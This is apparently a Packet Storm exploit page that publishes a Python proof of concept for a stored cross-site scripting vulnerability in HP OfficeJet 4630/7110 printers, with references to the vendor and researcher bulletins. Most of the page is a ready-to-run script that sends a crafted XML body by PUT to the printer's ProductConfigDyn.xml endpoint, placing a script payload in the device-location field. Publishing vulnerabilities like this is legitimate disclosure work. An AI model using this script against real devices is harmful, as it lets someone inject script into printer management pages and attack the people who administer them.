exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HP OfficeJet 4630/7110 MYM1FN2025AR 2117A Cross Site Scripting

HP OfficeJet 4630/7110 MYM1FN2025AR 2117A Cross Site Scripting
Posted Aug 25, 2021
Authored by Tyler Butler

HP OfficeJet 4630/7110 MYM1FN2025AR 2117A suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 9c47a3df0aeac66e90d1c67436d761aefbe3c0374807c5fb8d446b2233f196be

HP OfficeJet 4630/7110 MYM1FN2025AR 2117A Cross Site Scripting

Change Mirror Download
# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
# Date: 01/08/2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www8.hp.com/
# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
# Version: HP OfficeJet 7110 Wide Format ePrinter
# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A

# PoC:
import requests
import json
from requests.exceptions import HTTPError

target = 'http://192.168.223.1' # The IP of the vulnerable taget
payload = '''<script>alert('XSS');</script>''' # The XSS injection payload you want to use
path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command
pre = '''
<?xml version="1.0" encoding="UTF-8"?>
<!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. -->
<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd">
<prdcfgdyn2:ProductSettings>
<prdcfgdyn:DeviceInformation>
<dd:DeviceLocation>
''' # The start of the request body
post = '''
</dd:DeviceLocation>
</prdcfgdyn:DeviceInformation>
</prdcfgdyn2:ProductSettings>
</prdcfgdyn2:ProductConfigDyn>
''' # The end of the request body
body = pre + payload + post


headers = {
'Host':'192.168.223.1',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
'Accept':'*/*',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'text/xml',
'Content-Length':str(len(body.encode('utf-8'))),
'Origin':'https://192.168.223.1',
'Connection':'close',
'Referer':target,
}

print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90')
try:
print('{!} Injecting payload :',payload)
response = requests.put(target+path, headers = headers, data = body)
response.raise_for_status()
except HTTPError as http_err:
print('{X}',f'HTTP error occurred: {http_err}')
except Exception as err:
print('{X}',f'Other error occurred: {err}')
else:
print('{!} Success!')

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close